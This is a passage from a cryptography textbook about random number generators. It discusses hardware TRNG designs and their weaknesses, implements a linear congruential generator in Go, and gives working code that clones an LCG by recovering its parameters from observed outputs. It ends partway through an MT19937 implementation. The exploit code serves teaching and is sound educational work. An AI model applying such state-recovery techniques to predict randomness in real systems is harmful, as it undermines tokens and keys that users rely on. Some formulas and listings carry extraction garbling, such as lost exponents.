on the underlying phenomena that lets us calculate entropy is important for an RNG.
There is no physical model we can use to predict the operation of ring oscillator-based
RNGs (which is further complicated by the presence of thermal and other kinds of
unpredictable drifts in oscillators).
Fabrication processes generally improve their processes over time, reducing even
thermal drift, and circuits that were designed well can end up generating highly pre-
dictable output with newer and improved manufacturing processes. This is similar to
Zener diodes where RNG is relying on a parasitic effect which is not the priority for
the manufacturing process (and is in many cases undesirable, to begin with).
Ring oscillators have a poor physical defense. Anyone with a sine wave generator
can introduce sine-shaped noise (close to the ring oscillator frequency) on the power
source of the chip and the oscillator will lock onto that frequency, making the output
of the TRNG trivial for the attacker to guess. This is an example of “fault-injection”
attacks where the attacker tries to influence the output of a TRNG.
If you do decide to use ring oscillator-based TRNGs here are some best practices to
follow:
Add a simple binary counter to the output of the TRNG, so you know how many
times the ring oscillator toggled from a 0 to a 1. If, e.g., in the last minute (or some
other window) the number of ones drastically outweigh the number of zeros, the
discrepancy could indicate faulty operation.
Make the design public and expose raw access to the TRNG’s full counter output bits
so its health can be assessed.
If you use a fixed delay to sample the TRNG (the simplest solution used virtually
everywhere), then have an external health checker estimate the unpredictability (by
calculating the entropy using the equation 2.2) per sample from the TRNG.
Remember that ring oscillator TRNGs are subject to simple noise injection attacks.
If that’s okay for your threat model then you’re good. On the other hand, if you need
some physical protection, consider potting 3 over your IC, or putting some other
physical barrier to keep the attacker at least a few millimeters away, and preferably a
few inches.
If you have access to a secure flash on-chip, which cannot easily be read by an at-
tacker, consider seeding your CSPRNG from both the TRNG and a seed stored in
flash, and then update the seed in flash from the CSPRNG. This way, if your TRNG
degrades due to process drift, temperature, etc, you can integrate the TRNG output
over multiple boot cycles, and hopefully reach a computationally un-guessable state.
While the last recommendation applies in general to other TRNGs as well ring oscillators-
based TRNGs should pay special attention to it owing to their poor defenses against fault-
injection attacks.
TRNGS BASED ON THE MODULAR ENTROPY MULTIPLICATION
The MEM architecture for RNGs takes thermal noise generated by a resistor and dou-
bles it repeatedly. This causes the voltage to grow exponentially. After it crosses a threshold
(which is the halfway point for the voltage range) instead of doubling the voltage itself it
doubles the excess from halfway point and adds the result to the original voltage. Since
the operations are performed in a modular fashion (meaning the result never overflows,
much like a clock where adding four hours to 9 results in 1 instead of overflowing to 13)
the excess-doubling step ends up having a net subtractive outcome (i.e., going from the
larger number of 9 to the smaller number of 1 in the example presented above).
3 Potting (electronics). https://en.wikipedia.org/wiki/Potting_(electronics)
Based on these two simple rules the voltage keeps fluctuating quite unpredictably but
stays within its range. The MEM method has many distinct advantages for a TRNG:
It is resistant to electromagnetic noise injection or capacitive/inductive coupling at-
tacks.
It provides a physical model that can be used to continuously assess the health of the
RNG.
The components involved are very cheap and few in number and the design is unen-
cumbered by patents.
Several free schematics are available (e.g., Bill Cox’s infnoise 4 design or Peter’s re-
design known as REDOUBLER 5 ).
It is also very fast, with infnoise being able to run in excess of 100 Mbit/second. It
is important to understand though that speed itself should not be a critical factor for
TRNGs as their output should be used only to seed cryptographically secure pseudo-
random number generators that we will soon discuss in this chapter. In general 512
random bits from a TRNG should be enough to seed CSPRNGs as long as the lat-
ter upholds its own security guarantees (in chapter 3 we will dive deeper into how
CSPRNGs are compromised).

GUIDELINES FOR DESIGNING TRNGS


The foundations of cryptographic security rely on the quality of random numbers and
it all starts with true random number generators. Unfortunately, there is no single “right
way” of designing TRNGs, but given below are some rules of thumb that can be helpful:
A good TRNG has a physical model that proves to skeptics the rate-of-generation
and entropy of generated bits based on fundamental physical properties. This is not
true of either Zener noise or ring oscillator TRNGs.
The health checker should shut down access to a poorly functioning TRNG, even if
it halts the system.
Many TRNGs use “randomness extractors” (explained in the next section) to make
sure that the final output has enough entropy even when the underlying physical pro-
cess is not providing it sufficiently (e.g., the output becomes biased with fluctuation of
ambient temperature). A good TRNG should expose the raw output (without running
it through a randomness extractor) from the entropy source so that a health checker
can compare the bits generated to what the physical model predicts. Note that Intel’s
TRNG (accessed by the RDRAND assembly instruction – a popular source of ran-
domness), gives no such access, and the circuit between the entropy source and what
we read is secret.
On-chip TRNGs should defend against the simplest of physically present attacks,
such as power supply noise injection. Note that Intel’s TRNG behind the RDRAND
4 Infinite Noise TRNG. https://github.com/waywardgeek/infnoise
5 REDOUBLER. https://github.com/alwynallan/redoubler
instruction appears to be extremely sensitive to noise injection, based on their pub-
lished schematics and SPICE simulations.
Stand-alone TRNGs such as USB stick-based TRNGs should defend against mali-
cious hosts. Most USB stick TRNGs are trivially attacked by the host in such a way
that the attacker can forever predict "‘random‘" bits from the USB device, and there
may be no way to ever tell that the attack has occurred. This could happen to a TRNG
in transit in the mail or perpetrated by anyone who has physical access to the device.
On every boot, have internal firmware verify the health of the TRNG.
If you assume that the TRNG will never fail or degrade in performance after produc-
tion, at least check its health (using the physical model for underlying phenomena)
during the production process.

REMOVING BIASES FROM TRNG OUTPUT WITH RANDOMNESS EXTRACTORS


The output from TRNGs is usually cleaned with a randomness extractor before being
used in real-world applications. This is needed because the physical source might not be
generating values with high enough entropy. A basic example of a randomness extractor
was given by John von Neumann (one of the pioneers in the field of computer science
– considered by some to be the Last Great Polymath 6 ), where the extractor algorithm
(implemented either in hardware or software) looked at successive bits generated by an
RNG; if the two bits matched no output was generated and if they differed only the first
bit was output. This would convert a sequence like 00 11 00 10 01 01 00 00 10 00
01 10 10 01 00 to 1 0 0 1 0 1 1 0; which means now we have fewer bits but greater
entropy, making the output more unpredictable.

Randomness extractors
Randomness extractors clean noise generated from weakly random entropy sources
to produce high-quality random output.

2.2.2 Pseudo Random Number Generators (PRNG)


Sampling the physical world and cleaning that noise to generate high-quality random num-
bers is a slow process. Our demand for random numbers usually outpaces the supply pro-
vided by TRNGs. Applications therefore rarely consume them directly but rather rely on
another category of RNGs known as pseudo random number generators (PRNGs).
PRNGs are algorithms that take a seed number (or numbers) as input, perform some cal-
culations on it and then generate an infinite stream of random numbers based on that seed.
They are called deterministic because the same seed will make a PRNG always generate
the same output. This is in contrast to TRNGs where it was impossible to clone the output
because the inputs were stochastic physical processes as opposed to a single number.

6 Thompson, P. (2018). John Von Neumann, the Last Great Polymath. Sothebys. https://www.sothebys.
com/en/articles/john-von-neumann-the-last-great-polymath
Figure 2.7 TRNGs are used to seed PRNGs

EXAMPLE: IMPLEMENTING LINEAR CONGRUENTIAL GENERATORS


A really simple PRNG can be created using just equation 2.3.

Xn+1 = (aXn + c) mod m (2.3)


Where X is the sequence of random values and
m, 0 < m is the “modulus”
a, 0 < a < m is the “multiplier”
c, 0 < c < m is the “increment”
X0 , 0 < X0 < m is the “seed” or initial value
Equation 2.3 is called linear congruential generator (LCGs) because new numbers are
related to past values linearly. We will implement an RNG based on LCGs. Since this is a
PRNG it is deterministic, which means we can use a reference RNG to compare our output.
As long as we use the same seed value our output should match the output generated
by a similar RNG. We will be using the LCG used by the C++ standard library for its
minstd_rand generator. Let’s first use the C++ version to generate reference values for a
given seed.
In listing 2.3 we are going to:
Use a fixed number for seeding the minstd_rand generator. Seeding with a hard-
coded value is pretty much akin to destroying a PRNG. PRNGs should be seeded
with truly random values obtained via TRNGs. For the time being, however, it is
okay, we want to generate a fixed output so that we can use it as a reference when
comparing it with output from our implementation.
Generate 10 outputs that we will use to compare our own LCG implementation
against.

Listing 2.3 ch02/lcg/cpp/main.cpp

1 #include <iostream>
2 #include <random>
3
4 int main() {
5 std::minstd_rand lcg_rand;
6
7 lcg_rand.seed(42);
8
9 for (int i = 0; i < 10; ++i) {
10 std::cout << lcg_rand() << ”, ”;
11 }
12 std::cout << lcg_rand() << std::endl;
13 }

We are using the default minstd_rand generator that comes with the C++ compilers.
If you compile and run this file with the GNU C++ compiler, you will get a sequence of
numbers looking like this:
$ g++ main.cpp
$ ./a.out
2027382, 1226992407, 551494037, 961371815, 1404753842, 2076553157,
1350734175, 1538354858, 90320905, 488601845, 1634248641

Next, we are going to implement this generator in Go ourselves using equation 2.3. The
LCG used by the C++ counterpart uses constant values given in equation 2.4.

m = 231 − 1
a = 48271 (2.4)
c=0

By plugging these constants in the LCG equation, and seeding with the same input (42),
we should get the same sequence of numbers back. Let’s write a program to do so.
Starting with the next example we will be splitting a single code file among multiple
listings in the book to make it easier to follow along. The full code for these examples can
be found in the book repository at https://github.com/krkhan/crypto-impl-
exploit. The book listings will only be focusing on specific portions that are important
or new to the discussion taking place. Please note that listing 2.4 starts at line 3.

Listing 2.4 ch02/lcg/go/impl_lcg/impl_lcg.go

3 type LCG struct {


4 multiplier int
5 increment int
6 modulus int
7 currentValue int
8 }

The fields multiplier, increment and modulus have been covered above as parts of
equation 2.3. Similarly, currentValue corresponds to Xn . The next value Xn+1 is there-
fore generated via the following function, which returns the old value and moves the RNG
one step forward. We continue listing the ch02/lcg/main.go file in listing 2.5, starting
from line 21 now.

Listing 2.5 ch02/lcg/go/impl_lcg/impl_lcg.go

21 func (lcg *LCG) Generate() int {


22 oldValue := lcg.currentValue
23 lcg.currentValue = (lcg.multiplier*oldValue + lcg.increment) % lcg.modulus
24 return oldValue
25 }

To test this LCG we will initialize it with the constants used in the C++ minstd_rand
generator – including the seed value of 42 (the same one we used in listing 2.3). Please
note that listing 2.6 refers to a different file name from the accompanying code repo.

Listing 2.6 ch02/lcg/go/impl_lcg/impl_lcg_test.go

7 func TestLCG(t *testing.T) {


8 multiplier := 48271
9 increment := 0 20 is 1, which is equal to 1 « 0
10 modulus := 1<<31 - 1 21 is 2, which is equal to 1 « 1
11 seed := 42 2n = 1 « n
12 lcg := NewLCG(multiplier, increment, int(modulus), int(seed))
13 expectedValues := []int{2027382, 1226992407, 551494037, 961371815,
14 1404753842, 2076553157, 1350734175, 1538354858, 90320905,
15 488601845, 1634248641}
16 for _, expected := range expectedValues {
17 generated := lcg.Generate()
18 if expected != generated {
19 t.Fatalf(”Generated: %d, Expected: %d”, generated, expected)
20 }
21 }
22 }

Let’s run the test:


$ make impl_lcg
go clean -testcache
go test -v ./ch02/lcg/go/impl_lcg
=== RUN TestLCG
--- PASS: TestLCG (0.00s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch02/lcg/go/impl_lcg 0.027
s

Our LCG produced the same output as the C++ one. The output sequence looks random
but as we’ll see in the next section, even if an attacker knows nothing about the internal
parameters of this LCG they can easily predict future outputs just by observing it in action
for a while. For the time being, we can see that a PRNG:
Has an algorithm that it uses to keep generating values.
Starts with a seed as input for the first run of that algorithm.
Has an internal state which keeps mutating according to the algorithm. In our LCG
example, the state was Xn , stored in lcg.currentValue.
This is shown in figure 2.8.
At some point, every PRNG starts repeating values. The number of steps it takes for a
PRNG to start repeating values is known as its period. For the LCG we implemented the
period is 231 − 1, meaning it will start repeating its output after generating 2147483647
values.
Figure 2.8 PRNGs have a state and are initialized with a seed. The PRNG algorithm keeps mutating the
state.

EXAMPLE: EXPLOITING LINEAR CONGRUENTIAL GENERATORS


Let’s say you have no idea what are the parameters (multipliers, increment, modulus)
of an LCG. Each time you observe a value you know the RNG’s current state (since the
algorithm just outputs the state – a single number – without any modification when gener-
ating a new value). Could you predict the future output of an LCG just by observing some
values? That is, if you saw the LCG produce some values X0 , X1 , X2 up to Xn would you
be able to predict Xn+1 if you didn’t know anything about the LCG’s initial configuration?
We revisit our LCG description in equation 2.5.

Xn+1 = (aXn + c) mod m (2.5)

We can start with a simple scenario by assuming that we (as attackers) have the multi-
plier a and the modulus m but not the increment c. We can simply observe two values X0
and X1 and find out the modulus by rearranging equation them as shown in equation 2.6.

X1 = (aX0 + c) mod m
(2.6)
c = (X1 − aX0 ) mod m

This is shown in listing 2.7.

Listing 2.7 ch02/lcg/go/exploit_lcg/exploit_lcg.go

49 func findIncrement(originalRng *impl_lcg.LCG, modulus, multiplier int) int {


50 s0, s1 := originalRng.Generate(), originalRng.Generate()
51 return (s1 - s0*multiplier) % modulus
52 }

Let’s say we know the modulus but neither the increment nor the multiplier. Can we
recover the multiplier? This time we observe three values X0 , X1 and X2 . We can find out
the multiplier using these values as shown in equation 2.7.
X1 = (aX0 + c) mod m
X2 = (aX1 + c) mod m
X2 − X1 = (aX1 − aX0 ) mod m
(2.7)
X2 − X1 = (a(X1 − X0 )) mod m
( )
(X2 − X1 )
a= mod m
(X1 − X0 )
There is a problem though, we need to find the inverse of a value (X1 − X0 ). Finding
the multiplicative inverse of something is easy for rational numbers. For example, the
multiplicative inverse of 5 is 15 ; for 73 it is 73 and so on. For modulus arithmetic, it’s a little
tricky. We are all familiar with the modular arithmetic of 12-hour clocks where 10 plus
3 hours is 1 (modulus 12). What is the multiplicative inverse of, let’s say, 7 mod 12? We
need to find some n to multiply 7 with that would result in  1. There is no 71 to pick
among integers modulo 12.
As it turns out, the multiplicative inverse for 7 modulo 12 is 7 itself! 7 into 7 is equal to
49, which is only 1 more than a multiple of 12. As you can see, the multiplicative inverse
is not straightforward in modular arithmetic. Finding modular multiplicative inverse has
many interesting solutions, but we are going to use the one provided by the Go standard
library itself. Unfortunately, the code for doing so will seem a little clunky right now, as
shown in listing 2.8. In the next chapter, we shall explore the “big numbers” library from
Go in further detail.

Listing 2.8 ch02/lcg/go/exploit_lcg/exploit_lcg.go

3 import (
4 ”github.com/krkhan/crypto-impl-exploit/ch02/lcg/go/impl_lcg”
5 ”math/big”
6 )
7
8 func findModInverse(a, m int64) int64 {
9 return new(big.Int).ModInverse(big.NewInt(a), big.NewInt(m)).Int64()
10 }

Now that we have a function to calculate modular multiplicative inverse with, we can
implement equation 2.7 in listing 2.9.

Listing 2.9 ch02/lcg/go/exploit_lcg/exploit_lcg.go

38 func findMultiplier(originalRng *impl_lcg.LCG, modulus int) int {


39 s0, s1, s2 := originalRng.Generate(), originalRng.Generate(), originalRng.
Generate()
40 inverse := int(findModInverse(int64(s1-s0), int64(modulus)))
41 multiplier := (s2 - s1) * inverse % modulus
42 if multiplier < 0 { Convert negative multiplier to positive if needed
43 return modulus + multiplier
44 } else {
45 return multiplier
46 }
47 }

Finding the modulus is the hardest part. Let’s say we are trying to find the upper limit of
the hours’ arm on a clock. In other words, we see numbers like 3, 5, 1, 11, 7, 8 etc. and we
are trying to find out how high they go when people talk about them. Sure, you know it’s 12
for the scenario of a clock but let’s say you were an alien who didn’t know that beforehand.
Somehow you were able to drop in on human conversations about daily plans. You could
probably infer that (for the long arm on the clock) 11 is the highest number people talk
about. However, in a particularly non-happening place, you might end up assuming that
people’s plans go at the most up to only 8 PM so the whole circle represents only nine
hours in total. On the other hand, if you had an automatic counter scanning all the eggs
coming into a supermarket once you see the totals of 204, 120, 132, 84, 240 and 348
you might reasonably conclude that the eggs are coming in crates of dozens because the
greatest common divisor (GCD) for all those numbers is 12. In other words, all of these
multiples of a dozen are equal to zero modulus 12.
To find the modulus of our LCG we need to find values that are congruent to zero
modulus m. Let’s generate a bunch of values this time as shown in equation 2.8.

X1 = (aX0 + c) mod m
X2 = (aX1 + c) mod m (2.8)
X3 = (aX2 + c) mod m

If we take the differences between each pair of consecutive values we get the equation
2.9.

Δ0 = (X1 − X0 ) mod m
Δ1 = (X2 − X1 ) mod m (2.9)
Δ2 = (X3 − X2 ) mod m

We can substitute values of X2 and X1 with their definitions from 2.8, resulting in
equation 2.10. Please note that the increment c is canceled out during the substitution.
Therefore, each ΔN is a multiple of ΔN −1 .

Δ1 = (X2 − X1 ) mod m
Δ1 = (aX1 − aX0 ) mod m
Δ1 = (a(X1 − X0 )) mod m
(2.10)
Δ1 = (aΔ0 ) mod m
Δ1  Δ0 mod m
Δ2  Δ1 mod m
Equation 2.10 can be used to find large numbers equal to zero modulus m. Let’s call
these “zeros”, they can be found by rearranging equation 2.10 into equation 2.11.

Zero = Δ2 Δ0 − Δ1 Δ1
Zero = a 2 X02 − a 2 X02 (2.11)
Zero  0 mod m

We can collect such “zero” values (which are non-zero integers but are congruent to
zero modulus m because they are multiples of m, similar to how 24, 36, 72 and 48 are
multiples of 12) and then calculate their GCD to find the modulus. To calculate the GCD
we will use the Go big library again as shown in listing 2.10.

Listing 2.10 ch02/lcg/go/exploit_lcg/exploit_lcg.go

12 func findGCD(a, b int64) int64 {


13 return new(big.Int).GCD(nil, nil, big.NewInt(a), big.NewInt(b)).Int64()
14 }

In listing 2.11 we:


Generate 1000 values using the original RNG.
Calculate differences between each value and its immediately preceding value.
Apply equation 2.11 to find zeros on line 27.
Find GCD of zero values on line 32 and return that as the modulus.

Listing 2.11 ch02/lcg/go/exploit_lcg/exploit_lcg.go

16 func findModulus(originalRng *impl_lcg.LCG) int {


17 var diffs []int
18 previousValue := originalRng.Generate()
19 for i := 0; i < 1000; i++ {
20 currentValue := originalRng.Generate()
21 diffs = append(diffs, currentValue-previousValue)
22 previousValue = currentValue
23 }
24
25 var zeros []int
26 for i := 2; i < len(diffs); i++ {
27 zeros = append(zeros, diffs[i]*diffs[i-2]-diffs[i-1]*diffs[i-1])
28 }
29
30 gcd := 0
31 for _, v := range zeros {
32 gcd = int(findGCD(int64(gcd), int64(v)))
33 }
34
35 return gcd
36 }
Listing 2.12 puts all of these pieces together in a function called CloneLCG() which
takes an LCG as input and then “clones” it by recovering the modulus, multiplier and
increment strictly by observing generated values of the original RNG. We generate one
last value from the original RNG on line 58 to act as the seed for our newly cloned RNG.

Listing 2.12 ch02/lcg/go/exploit_lcg/exploit_lcg.go

54 func CloneLCG(originalRng *impl_lcg.LCG) *impl_lcg.LCG {


55 modulus := findModulus(originalRng)
56 multiplier := findMultiplier(originalRng, modulus)
57 increment := findIncrement(originalRng, modulus, multiplier)
58 seed := originalRng.Generate()
59 clonedRng := impl_lcg.NewLCG(multiplier, increment, modulus, seed)
60 return clonedRng
61 }

Listing 2.13 tests our CloneLCG() function by creating an LCG and seeding it with the
current UNIX time in seconds. We then clone the LCG and generate 100 values to ensure
that the cloned RNG and original RNG are generating the same values, or in other words,
the cloned RNG is predicting the original RNG correctly.

Listing 2.13 ch02/lcg/go/exploit_lcg/exploit_lcg_test.go

54 func TestCloneLCG(t *testing.T) {


55 multiplier := 48271
56 increment := 0
57 modulus := 1<<31 - 1
58 seed := time.Now().Unix()
59
60 originalRng := impl_lcg.NewLCG(multiplier, increment, modulus, int(seed))
61 clonedRng := CloneLCG(originalRng)
62
63 for i := 0; i < 100; i++ {
64 clonedValue := clonedRng.Generate()
65 observedValue := originalRng.Generate()
66 if observedValue != clonedValue {
67 t.Fatalf(”observed: %08x, cloned: %08x”, clonedValue, observedValue)
68 }
69 if i%20 == 0 {
70 t.Logf(”observed: %08x, cloned: %08x”, clonedValue, observedValue)
71 }
72 }
73 }

You can run these tests using make exploit_lcg in the code repo:
$ make exploit_lcg
go clean -testcache
go test -v ./ch02/lcg/go/exploit_lcg
=== RUN TestCloneLCG
exploit_lcg_test.go:26: observed: 52e4acba, cloned: 52e4acba
exploit_lcg_test.go:26: observed: 72008d98, cloned: 72008d98
exploit_lcg_test.go:26: observed: 797724ca, cloned: 797724ca
exploit_lcg_test.go:26: observed: 2f7f18a9, cloned: 2f7f18a9
exploit_lcg_test.go:26: observed: 4672328b, cloned: 4672328b
--- PASS: TestCloneLCG (0.00s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch02/lcg/go/exploit_lcg 0.031
s

We were able to successfully clone a linear-congruential generator just by observing its


output. Now we can stay one step ahead of the RNG as we would always know which value
it is going to generate. Despite their widespread usage as general-purpose RNGs, LCGs
are not suited for usage in cryptography. In the next section, we shall take a look at what
would it take for an RNG to be cryptographically secure.

2.2.3 Cryptographically Secure Pseudo Random Number Generators (CSPRNG)


We saw that a good PRNG should have a uniform output distribution to achieve maximum
entropy. It should have a long period so that values do not start repeating themselves too
soon. Are these properties enough to warrant the use of a PRNG in cryptographic applica-
tions? Not really, we were able to break LCGs quite easily. There are a few other properties
we need to worry about when using PRNGs in cryptographic contexts.
Imagine that you can drop in the middle of the process while a PRNG was generating
a number, e.g., in figure 2.1. Everything about the PRNG, including its algorithms and
constants is known to us as the attackers.
You see the following stream of numbers being produced by the RNG:
1538354858, 90320905, 488601845, 1634248641

To be cryptographically secure, this PRNG should satisfy the following properties:


An attacker should not be able to look at these values and deduce that they came from
a PRNG (versus some random noise).
An attacker should not be able to guess past values (the ones before 1538354858) by
looking at this output. This is referred to as forward secrecy.
An attacker should not be able to guess future values (the ones after 1634248641)
by looking at this output. This is referred to as backward secrecy. (Don’t worry if the
direction of forward/backward sounds particularly confusing, you are not alone.)
Now let us say that this output was generated by the LCG we implemented in the previ-
ous section. It is not cryptographically secure because it satisfies neither of those qualities.
Remember, the algorithm itself and all the constants are known to the attacker. To predict
future values, all they need to do is to seed their own LCG clone with 1634248641 and
then start generating values independent of the original RNG. Similarly, they can work
out values before 1538354858 by rearranging the terms of equation 2.3.
If you look at the PRNG in figure 2.8, at each step we can see that the previous state is
mutated to generate a new state. We can visualize this as shown in figure 2.9.
If an attacker sees the output on the right of this box, they immediately know the internal
state of the PRNG since state is the output. In other words, we do not have any difference
between the internal states of our PRNG and the outputs it generates. This immediately
Figure 2.9 PRNGs mutate the previous state to generate the next one.

thwarts backward secrecy because the attacker can simply replicate the state by looking at
the output and then use the publicly-known algorithm to generate new values.
We address this by adding another dotted arrow between the state and the output as
shown in figure 2.10.

Figure 2.10 Some PRNGs transform the state before outputting it as the next value.

The dotted arrows represent transformations that are hard to reverse. This means that if
someone knows the output on the right, it should be hard for them to calculate the state
and by extension, the previous values (coming into the box from the left). The next block
would therefore look like figure 2.11.
We can now visualize our PRNGs as a “state-machine” as shown in figure 2.12.
There are three functions in figure 2.12:
Init(Seed) transforms the seed to generate State0 .

Next(StateN ) transforms StateN to generate StateN+1 .

Output(StateN ) transforms StateN to generate OutputN .


Next(StateN ) and Output(StateN ) represent the dotted arrows in figure 2.10. CSPRNGs
choose these functions carefully to ensure that they are hard to reverse. In weak PRNG
implementations, they are sometimes combined so a single function call performs both
Next and Output at the same time – advancing the state by one step and returning the new
value at the same time as we saw in the case of our LCG implementation. Some PRNGs
utilize the same state to output several different values, before mutating the state to the
next step. We will see an example of this in Chapter 3.
PRNGs such as the one shown in figure 2.12 can be attacked in a few ways. The two
most common methods are explained below.
Figure 2.11 Two consecutive steps for a PRNG

Figure 2.12 PRNG as a “state-machine”

Input-based attacks: Every PRNG needs to be seeded. If an attacker can guess the
seed they can recover the entire output by simply running the PRNG on that seed.
For example, it used to be common practice in applications to seed using the system
time. Similar to the birthday password-guessing we saw earlier in this chapter, the
attacker can simply guess all the seconds in the last month to find the right seed. For
our LCG examples, we used a fixed seed of 42 precisely because we want to generate
a fixed output that we would then be able to compare to a reference implementation.
To protect against these attacks TRNGs are used to seed the input of PRNGs. Re-
member, TRNGs produce random numbers based on physical phenomena but are
not very performant. PRNGs provide good performance but rely on a seed value
which can lead to input-based attacks. The solution is to combine them as shown in
figure 2.7.
State Compromise Extension Attacks: If an attacker can compute the internal state
of a PRNG (essentially somehow reverse the Next() function in figure 2.12 they can
compute all the future values that will be generated by this PRNG. We will cover this
in much more detail in the next chapter where we will implement two such attacks.
2.3 Summary
Random numbers are used extensively in cryptographic applications.
Random number generators are characterized by their output distribution and en-
tropy.
The entropy of an RNG is maximized when its output distribution is uniform.
Hardware random number generators (HRNGs) – also known as true random num-
ber generators (TRNGs) – sample physical phenomena to generate a slow but unpre-
dictable stream of output.
TRNGs need to be carefully designed and tested to ensure good quality randomness.
Since they are used as input to CSPRNGs which eventually generate all the random-
ness needed for cryptography, good security begins at the TRNG.
TRNGs can be based on a variety of physical phenomena ranging from nuclear decay
to noise in electrical circuits.
Avalanche and Zener diodes are widely used in TRNG constructions but are sus-
ceptible to attacks and do not provide a good way to assess the health of the RNG
process.
Modular entropy multiplication is a relatively newer method for constructing TRNGs
which also provides a physical model to assist in continuous monitoring of the RNG’s
health.
Pseudo-random number generators (PRNGs) take seed values as input and generate
a fast but deterministic stream output.
Cryptographically secure random number generators (CSPRNGs) are PRNGs that
satisfy some additional properties, most importantly backward and forward security.
Always use CSPRNGs for cryptographic applications and avoid weak PRNGs that
are used by default in many programming languages.
Seed your CSPRNGs with good-quality seeds obtained from TRNGs.
Periodically reseed your CSPRNG so that the same seed is not used forever. This
helps protect against state extension attacks.
PRNGs are usually compromised by guessing their seed or by reverse-engineering
their internal states.
Linear congruential generators (LCG) are very basic (and insecure) PRNGs, there is
no difference between their state and output.
LCG-based RNGs can be broken by recovering their parameters (increment, multi-
plier, modulus) from generated values using linear algebra.
This chapter covers
Implementing and

How cryptographically-secure pseudo-random num-


exploiting RNGs

3
ber generators (CSPRNGs) are implemented
How can CSPRNGs can be compromised via
specific weaknesses in their underlying algo-
rithms

In the previous chapter, we saw how pseudo-random number generators (PRNGs) work
in theory. In this chapter, we will implement two widely-known RNGs and then write code
to exploit them. One of them was a CSPRNG recommended by NIST (National Institute
of Standards and Technology)! 1
Init(Seed) transforms the seed to generate State0 .

Next(StateN ) transforms StateN to generate StateN+1 .

Output(StateN ) transforms StateN to generate OutputN .

As we cover two examples in this chapter we will see how those functions are imple-
mented by the respective RNGs.

1 Cryptographic implementations widely rely on algorithms and constants defined by NIST standards.
Figure 3.1 PRNGs mutate the previous state to generate the next one.

3.1 Implementing and exploiting Mersenne Twister-based RNGs


Mersenne Twister RNGs are based on Mersenne prime numbers, which are prime num-
bers of the form Mn = 2n − 1 (which are in turn named after the 17th century French
polymath Marin Mersenne). They are widely used in many programming languages such
as Ruby, PHP, Python and C++. They have extremely long periods equal, i.e., their output
starts repeating after generating 2n − 1 values for an RNG based on the Mersenne prime
Mn .

3.1.1 Implementing MT19937


The first RNG that we will attack with code is known as MT19937 where MT is the ab-
breviation for Mersenne Twister. MT19937 is a specific type of Mersenne Twister that
relies on the prime number: 219937 − 1. MT19937 is not a CSPRNG by a long shot and
was not intended to be used in cryptographic applications but it is interesting to us for two
reasons:
It provides a very good practical example of how RNGs are broken.
Its usage as a general-purpose RNG is pervasive enough in common programming
languages and libraries that it is important to understand what makes it weak and why
it should be avoided.
Let’s start by creating a new type in listing 3.1 with enough space to hold N integers.
We also keep track of an index which points to the next element of the state that will be
generated as the output.

Listing 3.1 ch03/mt19937/impl_mt19937/impl_mt19937.go

27 type MT19937 struct {


28 index uint32
29 state [N]uint32
30 }
31
32 func NewMT19937() *MT19937 {
33 return &MT19937{
34 index: 0,
35 state: [N]uint32{},
36 }
37 }
38
39 func NewMT19937WithState(state [N]uint32) *MT19937 {
40 return &MT19937{
41 index: 0,
42 state: state,
43 }
44 }

We can now tackle initialization of the internal state based on a seed value x0 . This is
equivalent to the Init(Seed) function in figure 3.1. The initialization function sets N
values of x according to the formula shown in equation 3.1, where i starts from 0 and runs
up to N − 1.

xi = f × (xi −1 ⊕ (xi −1 ≫ (w − 2))) + i (3.1)

Each implementation of Mersenne Twister-based RNGs relies on a handful of con-


stants. In the case of MT19937, these constants are given in listing 3.2. 2 For our exploit
it’s not important to understand the underlying mathematical theory behind how these
constants were selected. The three constants we have encountered so far are f and w in
equation 3.1 as well as N which dictates that the internal state of our MT19937 RNG will
consist of 624 numbers. The RNG increments index each time it generates an output and
once it has done so 624 times it refreshes the entire state to generate a new collection of
624 values.

Listing 3.2 ch03/mt19937/impl_mt19937/impl_mt19937.go

3 const (
4 W uint32 = 32 w in equation 3.1
5 N uint32 = 624 MT19937 state in listing 3.1 consists of 624 integers.
6 M uint32 = 397
7 R uint32 = 31
8
9 A uint32 = 0x9908B0DF
10 F uint32 = 1812433253 f in equation 3.1
11
12 U uint32 = 11
13 D uint32 = 0xFFFFFFFF
14
15 S uint32 = 7
16 B uint32 = 0x9D2C5680
17
18 T uint32 = 15
19 C uint32 = 0xEFC60000
20
21 L uint32 = 18
22
23 LowerMask uint32 = 0x7FFFFFFF
24 UpperMask uint32 = 0x80000000
25 )

2 Mersenne Twister. https://en.wikipedia.org/wiki/Mersenne_Twister


We can now use these constants to implement equation 3.1 in listing 3.3. The mt.state
array holds N (624) values that represent the internal state (x0 , x1 , x2 , ..., x623 ).

Listing 3.3 ch03/mt19937/impl_mt19937/impl_mt19937.go

46 func (mt *MT19937) Seed(seed uint32) {


47 mt.index = 0
48 mt.state[0] = seed
49 for i := uint32(1); i < N; i++ {
50 mt.state[i] = (F*(mt.state[i-1]^(mt.state[i-1]>>(W-2))) + i)
51 }
52 }

MT19937 defines a Temper(x) function that takes a single xi and “tempers” the input
to generate a transformed output. This is similar to the Output(StateN ) function in figure
3.1, and it should be hard to reverse. Listing 3.4 implements the temper function in Go. It
utilizes some more constants from the ones we defined in listing 3.1. As we will see in the
upcoming section on exploiting our RNG, the reversibility of the Temper(x) function plays
a huge role in making MT19937 insecure. It transforms y to output y4 by performing
some complicated bit-manipulation on it but all of the operations are easily reversible for
an adversary regardless of their complexity.

Listing 3.4 ch03/mt19937/impl_mt19937/impl_mt19937.go

75 func temper(y uint32) uint32 {


76 y1 := y ^ (y>>U)&D
77 y2 := y1 ^ (y1<<S)&B
78 y3 := y2 ^ (y2<<T)&C
79 y4 := y3 ^ (y3 >> L)
80 return y4
81 }

After seeding and generating the first 624 values the MT19937 will have exhausted its
internal state. At that point, it defines another function called Twist(state) which takes an
existing state of 624 values and generates new 624 values to be used as the next state. This
is equivalent to the Next(StateN ) function in figure 3.1. The twist() function shown
in listing 3.5 loops from 0 to N-1 and updates each element of the state by following
some more bit manipulation techniques. The attacker does not need to understand the
details behind why the bit manipulation is done the way it is, their only goal is to reverse
the manipulations which we will in the upcoming section. The important thing to keep
in mind is that twist() will transform the current state of 624 values to generate a new
internal state with the same cardinality (i.e., exactly 624 values as before) but an entirely
new batch of numbers. The twist() function also relies on some of the constants listed
in listing 3.2.

Listing 3.5 ch03/mt19937/impl_mt19937/impl_mt19937.go

63 func (mt *MT19937) twist() {


64 for i := uint32(0); i < N; i++ {
65 x := (mt.state[i] & UpperMask) + (mt.state[(i+1)%N] & LowerMask)
66 xA := x >> 1
